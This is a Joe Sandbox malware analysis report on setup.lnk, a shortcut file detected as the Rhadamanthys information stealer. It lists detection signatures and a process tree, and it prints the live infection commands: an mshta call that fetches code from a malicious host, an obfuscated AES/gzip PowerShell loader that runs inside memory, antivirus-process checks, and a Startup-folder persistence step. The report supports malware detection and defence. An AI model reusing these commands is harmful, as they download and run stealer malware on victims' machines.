Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.lnk

Overview

General Information

Sample name:setup.lnk
Analysis ID:1395713
MD5:a69e28c995425fb3d3723b45c18ac227
SHA1:afebe09ea1516f1378b6254ee6bc927501e24c96
SHA256:1c7476c33f0d56e970dbfad87da96739d74bbd1928c4a044715ea75f61e72192
Tags:lnk
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
Contains functionality to register a low level keyboard hook
Drops PE files with a suspicious file extension
Found URL in windows shortcut file (LNK)
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows shortcut file (LNK) contains suspicious command line arguments
Abnormal high CPU Usage
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file does not import any functions
PE file overlay found
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • forfiles.exe (PID: 4320 cmdline: "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://whitemansearch.shop/setup MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 3792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4672 cmdline: start mshta http://whitemansearch.shop/setup MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 7216 cmdline: "C:\Windows\system32\mshta.exe" http://whitemansearch.shop/setup MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 7364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell - MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" - MD5: 04029E121A0CFA5991749937DD22A1D9)
            • chrome.exe (PID: 7596 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/2ZrVm4 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7832 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1972,i,9908124520727013637,16052359887422154875,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • WmiPrvSE.exe (PID: 7252 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • ClassroomEc.exe (PID: 8148 cmdline: "C:\Users\user\AppData\Roaming\ClassroomEc.exe" MD5: 956D074F7C6BD174C43586F07892E820)
              • conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 748 cmdline: "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 5060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • tasklist.exe (PID: 6096 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
                • findstr.exe (PID: 8084 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
                • tasklist.exe (PID: 4980 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
                • findstr.exe (PID: 2764 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
                • cmd.exe (PID: 8224 cmdline: cmd /c md 29026 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • cmd.exe (PID: 8240 cmdline: cmd /c copy /b Producing + Imaging + Phd + Ada + Organ 29026\Identification.pif MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • cmd.exe (PID: 8256 cmdline: cmd /c copy /b Conf 29026\m MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • Identification.pif (PID: 8272 cmdline: 29026\Identification.pif 29026\m MD5: 848164D084384C49937F99D5B894253E)
                  • cmd.exe (PID: 8616 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & echo URL="C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • PING.EXE (PID: 8288 cmdline: ping -n 5 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)
  • svchost.exe (PID: 7292 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
No configs have been found
SourceRuleDescriptionAuthorStrings
00000019.00000003.2987224346.0000000001500000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    00000019.00000003.2990376919.0000000004BE0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000019.00000003.2990182254.0000000001E20000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        Process Memory Space: powershell.exe PID: 7364INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xcf69a:$b1: ::WriteAllBytes(
        • 0xcfb3c:$b1: ::WriteAllBytes(
        • 0x149b8b:$b1: ::WriteAllBytes(
        • 0x22fc8c:$b1: ::WriteAllBytes(
        • 0x2aad16:$b1: ::WriteAllBytes(
        • 0x38cb:$b2: ::FromBase64String(
        • 0x38ff:$b2: ::FromBase64String(
        • 0x4040:$b2: ::FromBase64String(
        • 0x4074:$b2: ::FromBase64String(
        • 0xb310:$b2: ::FromBase64String(
        • 0xb344:$b2: ::FromBase64String(
        • 0xba85:$b2: ::FromBase64String(
        • 0xbab9:$b2: ::FromBase64String(
        • 0xc488:$b2: ::FromBase64String(
        • 0xcc258:$b2: ::FromBase64String(
        • 0xcc28d:$b2: ::FromBase64String(
        • 0xcc9f3:$b2: ::FromBase64String(
        • 0xcca29:$b2: ::FromBase64String(
        • 0xcd3c4:$b2: ::FromBase64String(
        • 0xcd3fa:$b2: ::FromBase64String(
        • 0xcdd4f:$b2: ::FromBase64String(
        Process Memory Space: powershell.exe PID: 7488INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xa6791:$b1: ::WriteAllBytes(
        • 0xa0c1f:$s1: -join
        • 0x111d69:$s1: -join
        • 0x11ee3e:$s1: -join
        • 0x122210:$s1: -join
        • 0x1228c2:$s1: -join
        • 0x1243b3:$s1: -join
        • 0x1265b9:$s1: -join
        • 0x126de0:$s1: -join
        • 0x127650:$s1: -join
        • 0x127d8b:$s1: -join
        • 0x127dbd:$s1: -join
        • 0x127e05:$s1: -join
        • 0x127e24:$s1: -join
        • 0x128674:$s1: -join
        • 0x1287f0:$s1: -join
        • 0x128868:$s1: -join
        • 0x1288fb:$s1: -join
        • 0x128b61:$s1: -join
        • 0x12acf7:$s1: -join
        • 0x139741:$s1: -join
        Click to see the 1 entries
        SourceRuleDescriptionAuthorStrings
        25.3.Identification.pif.4be0000.9.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          25.3.Identification.pif.4be0000.9.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            25.3.Identification.pif.1e20000.8.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              SourceRuleDescriptionAuthorStrings
              amsi64_7488.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc049:$b1: ::WriteAllBytes(
              • 0xbcbc:$s1: -join
              • 0x5468:$s4: +=
              • 0x552a:$s4: +=
              • 0x9751:$s4: +=
              • 0xb86e:$s4: +=
              • 0xbb58:$s4: +=
              • 0xbc9e:$s4: +=
              • 0x663c1:$s4: +=
              • 0x66441:$s4: +=
              • 0x66507:$s4: +=
              • 0x66587:$s4: +=
              • 0x6675d:$s4: +=
              • 0x667e1:$s4: +=
              • 0xc7d1:$e4: Get-WmiObject
              • 0xc9c0:$e4: Get-Process
              • 0xca18:$e4: Start-Process

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" http://whitemansearch.shop/setup, CommandLine: "C:\Windows\system32\mshta.exe" http://whitemansearch.shop/setup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: start mshta http://whitemansearch.shop/setup, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4672, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" http://whitemansearch.shop/setup, ProcessId: 7216, ProcessName: mshta.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 